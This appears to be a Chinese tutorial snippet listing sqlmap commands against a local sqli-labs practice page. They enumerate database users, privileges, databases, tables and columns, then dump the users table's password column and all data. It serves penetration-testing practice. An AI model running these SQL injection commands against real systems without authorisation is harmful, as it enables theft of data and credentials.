查询数据库当前用户
sqlmap -u "http://127.0.0.1/sqli-lasb/Less-1/?id=1" --current-user #查看数据库当前的用户
查询当前数据库用户是否是管理员权限
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --is-dba #判断当前用户是否有管理员权限
列出数据库的管理员用户名
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --roles
查询所有数据库
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --dbs
查询当前数据库
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --current-db
输出指定数据库名字下的全部表
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --tables
输出指定数据名下指定表下的全部列
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --columns
输出指定数据库指定列指定字段下的全部数据
sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T users -C password --dump
-all系列
1、输出该数据库中全部数据
sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dump-all
时间过长,截取选取扫描过程中的过程截图:
2、输出指定数据库中的全部数据
sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security --dump-all
时间过长,截取选取扫描过程中的过程截图:
![[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解](https://ucc.alicdn.com/pic/developer-ecology/77db7765d45846089db4904c6b4010e8.png?x-oss-process=image/resize,h_160,m_lfit)
![[工具使用]WpScan(上)](https://ucc.alicdn.com/pic/developer-ecology/6822345adc664f9caa82ff27f2db4a04.png?x-oss-process=image/resize,h_160,m_lfit)